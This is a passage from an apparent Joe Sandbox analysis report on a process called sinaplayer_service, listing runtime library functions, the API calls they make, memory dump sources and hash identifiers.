                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000003C,0000003C,?,?,003771C3,?,8285FFAB,00000000,00000000,00000000,0000003C,00000000), ref: 0037D332
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 373104503-3788999226
                                                                                                                                                                                                    • Opcode ID: c963df41a9a7a0a1fae4066955e74e870d1eab1ed8e9df5b93a881f8fb47618a
                                                                                                                                                                                                    • Instruction ID: 7f4af81849699a39261d76fe6072b70d5878565f363b9e47fcc5676c7c94893c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c963df41a9a7a0a1fae4066955e74e870d1eab1ed8e9df5b93a881f8fb47618a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACF024725003115FD3219F58E901797B7E8AF54710F00882EE65EC7200E7B9E441CBA2
                                                                                                                                                                                                    Function 6C56EAF3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfowcslen
                                                                                                                                                                                                    • String ID: I
                                                                                                                                                                                                    • API String ID: 2689964535-3707901625
                                                                                                                                                                                                    • Opcode ID: 9c37a6a3ebfe66e9fcd513b538005e3099b3ebd00d8d87435b18cd7b5d3d85b2
                                                                                                                                                                                                    • Instruction ID: 1f75a03ac49ce6d6228936a21bf7757bffbab0f755a04ca6fcdd1867818c15e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c37a6a3ebfe66e9fcd513b538005e3099b3ebd00d8d87435b18cd7b5d3d85b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A017172D0121ADBDF109FA9DC016EE7BB4FF05329F100616E934A66E0D77585268BE1
                                                                                                                                                                                                    Function 6C56ACD3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfostrlen
                                                                                                                                                                                                    • String ID: I
                                                                                                                                                                                                    • API String ID: 1371076374-3707901625
                                                                                                                                                                                                    • Opcode ID: a5f64acb0cfe6047d5516fa7c526f73389597081c2670116c273927e34166219
                                                                                                                                                                                                    • Instruction ID: 46a6016edd9b850f6ecf010568995258c4204eadf312f71891b0e3e46d6fa75e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5f64acb0cfe6047d5516fa7c526f73389597081c2670116c273927e34166219
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E801B171C002199BDF009FA9DC006EE7BB8EF48325F10061AE920A6690DB7589118BE5
                                                                                                                                                                                                    Function 6C5BAF6F Relevance: 6.3, APIs: 5, Instructions: 17COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?,?,6C5BAF12), ref: 6C5BAF79
                                                                                                                                                                                                      • Part of subcall function 6C55ECE0: HeapFree.KERNEL32(00000000,00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C55ECF4
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,6C5BAF12), ref: 6C5BAF81
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5BAF12), ref: 6C5BAF89
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6C5BAF12), ref: 6C5BAF91
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,6C5BAF12), ref: 6C5BAF97
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 32654580-0
                                                                                                                                                                                                    • Opcode ID: 35c46fae50c05662356181fb7ad4d344ed15a287719cd2b1bd15bcf9abf46fa9
                                                                                                                                                                                                    • Instruction ID: 797989dcf600938e2b32f590a8491f2809d9c9ebb8a9f1e150a926bbf16f6e55
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35c46fae50c05662356181fb7ad4d344ed15a287719cd2b1bd15bcf9abf46fa9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81D0A731482E20DBC6232F24ED039CB76517FA02583810D27B48131F309B99FC3897D4
                                                                                                                                                                                                    Function 6C56CF18 Relevance: 6.2, APIs: 4, Instructions: 192stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __forcdecpt_l_mbtowc_lstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 810383619-0
                                                                                                                                                                                                    • Opcode ID: e6205bd884e2f2c9398675e8af2c85c5044fc283ce3ba5cc6396f99fdc022120
                                                                                                                                                                                                    • Instruction ID: b616f20889d0dc0c28efa0942a0d18d7a380a0a57acbb000d39db2af8c321d18
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6205bd884e2f2c9398675e8af2c85c5044fc283ce3ba5cc6396f99fdc022120
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E77181F1D052298EDB208B56CC40BD9B7B8AB44318F2449EAD708A7A51EB749FC58F58
                                                                                                                                                                                                    Function 6C578F92 Relevance: 6.2, APIs: 4, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 81384a4e81c0935693e3500a56c64ed1cacf48e7f521c4bf9bf5f76748f98917
                                                                                                                                                                                                    • Instruction ID: 5fcfd36bd2d0b5a394f7d4342d70a03a466c867a41c712807909a4fa9173293d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81384a4e81c0935693e3500a56c64ed1cacf48e7f521c4bf9bf5f76748f98917
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB513776A11207DBDB09CE5ECD9469D33F6FB46328F18412AE810CBA90EB35D9428B21
                                                                                                                                                                                                    Function 6C5BE943 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6C5BE97B
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::FlushHistories.LIBCMT ref: 6C5BE990
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::Hill$FlushHistoriesHistory
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2521976074-0
                                                                                                                                                                                                    • Opcode ID: 0e1ea9663bcb34ca200587aea9e1fbba43a9794020472617e256aae86a2a6d03
                                                                                                                                                                                                    • Instruction ID: 99aadd74c86250998d245eb206cba9e5c27af105db339d20ef0b44a7fe632728
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e1ea9663bcb34ca200587aea9e1fbba43a9794020472617e256aae86a2a6d03
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F451C630600A06EBCB089F24C8606D9FFF9FF45344F198699C49663641EFB1A965CBD5
                                                                                                                                                                                                    Function 6C5BAB18 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6C5B9F50,?,?,?,?,00000000,00000000), ref: 6C5BAB46
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6C5B9F50,?,?,?,?,00000000,00000000), ref: 6C5BAB66
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5BAC8A
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5BAC93
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    • Opcode ID: 18214f1ebb69e61ce8dd15747d9ea3c5218b36c8b23233d7e3175f5c03915d63
                                                                                                                                                                                                    • Instruction ID: 1c1dad290e0b9d6a80edf2177dfe7b7ffcb87e5965567d8015701d57c6892662
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18214f1ebb69e61ce8dd15747d9ea3c5218b36c8b23233d7e3175f5c03915d63
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7512CB5A01606EFCB04CF69C991A99FBF1FF48314B10826AD81997B40D734F951CF90
                                                                                                                                                                                                    Function 00376EB0 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@ABV01@@Z.BASE(?,8285FFAB,00000000,8285FFAB,?,?,?,?,0000003C,003994D9,000000FF,?,0037696A,0000003C,?), ref: 00376F67
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?,?,8285FFAB,00000000,8285FFAB,?,?,?,?,0000003C,003994D9,000000FF,?,0037696A,0000003C,?), ref: 00376F78
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(0000003C,?,8285FFAB,00000000,8285FFAB,?,?,?,?,0000003C,003994D9,000000FF,?,0037696A,0000003C,?), ref: 00376F84
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(?,8285FFAB,00000000,8285FFAB,?,?,?,?,0000003C,003994D9,000000FF,?,0037696A,0000003C,?), ref: 00376F94
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePath@base@@$V01@@$V01@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2909396759-0
                                                                                                                                                                                                    • Opcode ID: 8c77071a08b6d5cd95355ce82b83ef9d52ee5c63c7a8ba6c7c0710b7d3601aa3
                                                                                                                                                                                                    • Instruction ID: df117ee7d6ec2af4fb89febf2cbcc083e828e02daf256c7762a87b2912dc32ba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c77071a08b6d5cd95355ce82b83ef9d52ee5c63c7a8ba6c7c0710b7d3601aa3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B418572E006199BCF19DF9DD9955EDBBB6FB88310F45822EE81AA7350D7306D04CB80
                                                                                                                                                                                                    Function 0038EFE0 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$??2@??3@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2316506902-0
                                                                                                                                                                                                    • Opcode ID: f8bc67d81f4067b628e8aeb82e4bb31661c69e6e45f883ed527248228155b9ae
                                                                                                                                                                                                    • Instruction ID: 6d88e644422e9b45df240e52618d1d206d6ac248a0836f28c4081f19472d8d01
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8bc67d81f4067b628e8aeb82e4bb31661c69e6e45f883ed527248228155b9ae
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2041D5B1B00B05FFEB1BAF74C845BA9F7A5FB05314F000279E91C92691EB75A864CB91
                                                                                                                                                                                                    Function 003747D0 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?,8285FFAB,?,?,?), ref: 00374858
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(8285FFAB,?,?,?), ref: 00374869
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Xbad_alloc@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3683936438-0
                                                                                                                                                                                                    • Opcode ID: b8aaa76016ef60d2697bfe6ab77cc34afc5d6cd09fb8a62e4013c2ceb2c87790
                                                                                                                                                                                                    • Instruction ID: 0cdcdd51746ce0760b508e53aeb1c28fb9fd761343bb77dab542f5d64e791c12
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8aaa76016ef60d2697bfe6ab77cc34afc5d6cd09fb8a62e4013c2ceb2c87790
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D931E9B1A00649EBCB35CF68C48066EB7F8EB45710F10862EE81AD7780E735A905C7A2
                                                                                                                                                                                                    Function 00371170 Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?,8285FFAB,?,?,?), ref: 003711F1
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(8285FFAB,?,?,?), ref: 00371200
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Xbad_alloc@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3683936438-0
                                                                                                                                                                                                    • Opcode ID: 81aae08c3b0f75f6c12e27afa13964150fb2e0987cf52973a2c717655df97eb2
                                                                                                                                                                                                    • Instruction ID: 8c6be97e341376dbd92fa65a2d152e50a04ebbb2e100485209db3bbc273edcda
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81aae08c3b0f75f6c12e27afa13964150fb2e0987cf52973a2c717655df97eb2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5431E672A006059FDB35CF6CC88166EBBF8EB45360F118B2DE85AD77C1D73599048791
                                                                                                                                                                                                    Function 00391F20 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000001,00391EAE,00000000), ref: 00391F85
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    • Opcode ID: 5e0da814f9c0bd0a57ec0d6e07b833f1bd43fc1ee30efcbb48603ca489da7c26
                                                                                                                                                                                                    • Instruction ID: 5eeb145bb84153b50d7804a80156adcc348b4c18377b4c2188acea64b5907d5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e0da814f9c0bd0a57ec0d6e07b833f1bd43fc1ee30efcbb48603ca489da7c26
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1831D571B14209ABDF25DF68DC05B6EB7B8EF49324F10026EF90A9B2C0D775A904C791
                                                                                                                                                                                                    Function 6C56EF00 Relevance: 6.1, APIs: 4, Instructions: 100COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C55F764: _getptd.MSVCR120(00000001,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C55F77A
                                                                                                                                                                                                    • _isleadbyte_l.MSVCR120(?,?), ref: 6C56EF4B
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5A5D30,00000001,00000000,00000000), ref: 6C56EF73
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5A5D30,00000001,00000000,00000000), ref: 6C5A6F4D
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A6F6D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
